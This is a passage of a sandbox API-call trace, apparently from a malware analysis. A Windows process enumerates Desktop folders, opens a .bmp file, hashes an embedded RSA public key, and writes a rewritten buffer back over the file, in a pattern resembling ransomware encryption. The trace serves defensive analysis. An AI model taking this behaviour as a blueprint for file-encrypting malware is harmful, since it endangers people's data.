(pszPath="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\") returned="UovhOsbqK0eMsW0c\\" [0200.359] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\") returned="sj76aMesI3jmtOuE2hz\\" [0200.359] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\") returned="Desktop\\" [0200.359] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0200.359] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0200.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0200.360] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0200.360] PathFindFileNameW (pszPath="") returned="" [0200.360] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\*" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\uovhosbqk0emsw0c\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2dce4250, ftCreationTime.dwHighDateTime=0x1d896ec, ftLastAccessTime.dwLowDateTime=0x45eff2e0, ftLastAccessTime.dwHighDateTime=0x1d8a31a, ftLastWriteTime.dwLowDateTime=0x45eff2e0, ftLastWriteTime.dwHighDateTime=0x1d8a31a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0200.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91678 | out: hHeap=0x620000) returned 1 [0200.363] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2dce4250, ftCreationTime.dwHighDateTime=0x1d896ec, ftLastAccessTime.dwLowDateTime=0x45eff2e0, ftLastAccessTime.dwHighDateTime=0x1d8a31a, ftLastWriteTime.dwLowDateTime=0x45eff2e0, ftLastWriteTime.dwHighDateTime=0x1d8a31a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0200.363] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf61dd9b0, ftCreationTime.dwHighDateTime=0x1d89b50, ftLastAccessTime.dwLowDateTime=0x94bf5ec0, ftLastAccessTime.dwHighDateTime=0x1d8a625, ftLastWriteTime.dwLowDateTime=0x94bf5ec0, ftLastWriteTime.dwHighDateTime=0x1d8a625, nFileSizeHigh=0x0, nFileSizeLow=0x3dec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0jip-0WU2n5fd8 POL.bmp", cAlternateFileName="0JIP-0~1.BMP")) returned 1 [0200.363] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\0jip-0WU2n5fd8 POL.bmp") returned=".bmp" [0200.363] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\0jip-0WU2n5fd8 POL.bmp" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\uovhosbqk0emsw0c\\0jip-0wu2n5fd8 pol.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0200.364] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=15852) returned 1 [0200.364] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0200.367] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x3dc6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.367] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0200.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0200.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.369] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0200.370] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x3dec, lpOverlapped=0x0) returned 1 [0200.371] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0200.371] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.371] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.371] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0200.373] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0200.373] CryptHashData (hHash=0x2cfe0c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0200.373] CryptGetHashParam (in: hHash=0x2cfe0c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0200.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0200.373] CryptGetHashParam (in: hHash=0x2cfe0c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0200.373] GetLastError () returned 0x0 [0200.373] CryptDestroyHash (hHash=0x2cfe0c0) returned 1 [0200.373] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0200.374] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0200.374] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0200.374] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0200.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0200.374] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0200.374] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0200.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3df0) returned 0x2ea99b0 [0200.374] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0200.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0200.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0200.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0200.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0200.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0200.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f930 [0200.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32c0 [0200.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f978 [0200.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32d8 [0200.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3308 [0200.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3368 [0200.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3320 [0200.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0200.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0200.376] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0200.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0200.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3308 | out: hHeap=0x620000) returned 1 [0200.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3320 | out: hHeap=0x620000) returned 1 [0200.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3368 | out: hHeap=0x620000) returned 1 [0200.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0200.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3368 [0200.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a00 [0200.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3320 [0200.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0200.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3308 [0200.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0200.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0200.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0200.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0200.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0200.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0200.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0200.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0200.378] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0200.378] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3320 | out: hHeap=0x620000) returned 1 [0200.378] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0200.378] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3308 | out: hHeap=0x620000) returned 1 [0200.378] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0200.378] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0200.379] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3368 | out: hHeap=0x620000) returned 1 [0200.379] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0200.379] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0200.379] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0200.379] GetCurrentThreadId () returned 0x66c [0200.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0200.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea7f68 [0200.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0200.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0200.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0200.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0200.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0200.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0200.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.381] GetCurrentThreadId () returned 0x66c [0200.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0200.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0200.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0200.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0200.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0200.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0200.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0200.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0200.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3368 [0200.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0200.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0200.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0200.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0200.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0200.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0200.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0200.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0200.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3308 [0200.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0200.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0200.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0200.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0200.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0200.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0200.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0200.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3320 [0200.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0200.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0200.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0200.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32f0 [0200.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0200.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3380 [0200.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0200.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0200.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0200.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3350 [0200.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0200.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3338 [0200.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0200.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3398 [0200.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3338 | out: hHeap=0x620000) returned 1 [0200.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3338 [0200.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3350 | out: hHeap=0x620000) returned 1 [0200.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0200.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0200.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0200.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0200.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0200.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3308 | out: hHeap=0x620000) returned 1 [0200.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3308 [0200.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0200.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0200.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3368 | out: hHeap=0x620000) returned 1 [0200.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0200.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3398 | out: hHeap=0x620000) returned 1 [0200.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0200.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0200.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0200.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0200.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0200.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3308 | out: hHeap=0x620000) returned 1 [0200.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0200.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0200.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0200.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0200.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0200.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0200.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0200.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0200.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0200.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0200.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0200.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0200.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3338 | out: hHeap=0x620000) returned 1 [0200.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0200.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3380 | out: hHeap=0x620000) returned 1 [0200.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0200.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3320 | out: hHeap=0x620000) returned 1 [0200.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32f0 | out: hHeap=0x620000) returned 1 [0200.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0200.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0200.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0200.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32d8 | out: hHeap=0x620000) returned 1 [0200.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8f978 | out: hHeap=0x620000) returned 1 [0200.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0200.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0200.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0200.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0200.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0200.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0200.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0200.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0200.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0200.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0200.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0200.393] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x3de7, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x3de7, lpOverlapped=0x0) returned 1 [0200.394] HeapFree (in: 